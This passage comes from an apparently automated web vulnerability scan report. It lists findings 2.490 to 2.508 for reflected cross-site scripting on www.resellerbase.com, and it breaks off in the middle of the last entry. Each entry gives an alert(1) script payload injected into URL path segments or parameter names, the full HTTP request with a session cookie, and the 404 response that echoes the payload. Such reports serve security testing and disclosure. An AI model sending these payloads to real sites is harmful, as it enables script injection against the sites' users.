Date: Wed, 17 Nov 2010 23:36:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication429c7<script>alert(1)</script>4816cfd906/broadband/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.490. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 605a6<script>alert(1)</script>135ebc958b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband605a6<script>alert(1)</script>135ebc958b8/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband605a6<script>alert(1)</script>135ebc958b8/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.491. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 698dd<script>alert(1)</script>010364314e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes698dd<script>alert(1)</script>010364314e5/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes698dd<script>alert(1)</script>010364314e5/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.492. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 403a9<script>alert(1)</script>579478cc971 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos403a9<script>alert(1)</script>579478cc971/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos403a9<script>alert(1)</script>579478cc971/images/rating/ was not found on this server.</p>
...[SNIP]...

2.493. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e84fd<script>alert(1)</script>15b86b49b51 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagese84fd<script>alert(1)</script>15b86b49b51/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagese84fd<script>alert(1)</script>15b86b49b51/rating/ was not found on this server.</p>
...[SNIP]...

2.494. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f9c0d<script>alert(1)</script>31a4a5a963 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/ratingf9c0d<script>alert(1)</script>31a4a5a963/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/ratingf9c0d<script>alert(1)</script>31a4a5a963/ was not found on this server.</p>
...[SNIP]...

2.495. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 47c76<script>alert(1)</script>5f97f0310a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/?47c76<script>alert(1)</script>5f97f0310a2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/?47c76<script>alert(1)</script>5f97f0310a2=1 was not found on this server.</p>
...[SNIP]...

2.496. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 522db<script>alert(1)</script>e8f1e1ae6f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication522db<script>alert(1)</script>e8f1e1ae6f2/broadband/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication522db<script>alert(1)</script>e8f1e1ae6f2/broadband/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.497. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e65e<script>alert(1)</script>151fc6cd0be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband3e65e<script>alert(1)</script>151fc6cd0be/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband3e65e<script>alert(1)</script>151fc6cd0be/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.498. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 44cab<script>alert(1)</script>340f6062b92 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes44cab<script>alert(1)</script>340f6062b92/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes44cab<script>alert(1)</script>340f6062b92/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.499. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f753c<script>alert(1)</script>d4c623fe04a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmosf753c<script>alert(1)</script>d4c623fe04a/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmosf753c<script>alert(1)</script>d4c623fe04a/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.500. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4b86c<script>alert(1)</script>78e5aec239f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images4b86c<script>alert(1)</script>78e5aec239f/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images4b86c<script>alert(1)</script>78e5aec239f/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.501. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7c63b<script>alert(1)</script>117e04ede1f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating7c63b<script>alert(1)</script>117e04ede1f/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating7c63b<script>alert(1)</script>117e04ede1f/2half.gif was not found on this server.</p>
...[SNIP]...

2.502. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 78d9e<script>alert(1)</script>ef2bea8344c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/2half.gif78d9e<script>alert(1)</script>ef2bea8344c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/2half.gif78d9e<script>alert(1)</script>ef2bea8344c was not found on this server.</p>
...[SNIP]...

2.503. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 48e56<script>alert(1)</script>7c538e3cc70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/2half.gif?48e56<script>alert(1)</script>7c538e3cc70=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/2half.gif?48e56<script>alert(1)</script>7c538e3cc70=1 was not found on this server.</p>
...[SNIP]...

2.504. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4073<script>alert(1)</script>50f782fcece was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationb4073<script>alert(1)</script>50f782fcece/broadband/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationb4073<script>alert(1)</script>50f782fcece/broadband/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.505. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d827b<script>alert(1)</script>a81bbd1177d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbandd827b<script>alert(1)</script>a81bbd1177d/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbandd827b<script>alert(1)</script>a81bbd1177d/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.506. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 34885<script>alert(1)</script>ae3cc3769e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes34885<script>alert(1)</script>ae3cc3769e3/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes34885<script>alert(1)</script>ae3cc3769e3/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.507. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a3d36<script>alert(1)</script>8f0614bfa87 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmosa3d36<script>alert(1)</script>8f0614bfa87/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmosa3d36<script>alert(1)</script>8f0614bfa87/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.508. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e06cf<script>alert(1)</script>3401b96f7d9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagese06cf<script>alert(1)</script>3401b96f7d9/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

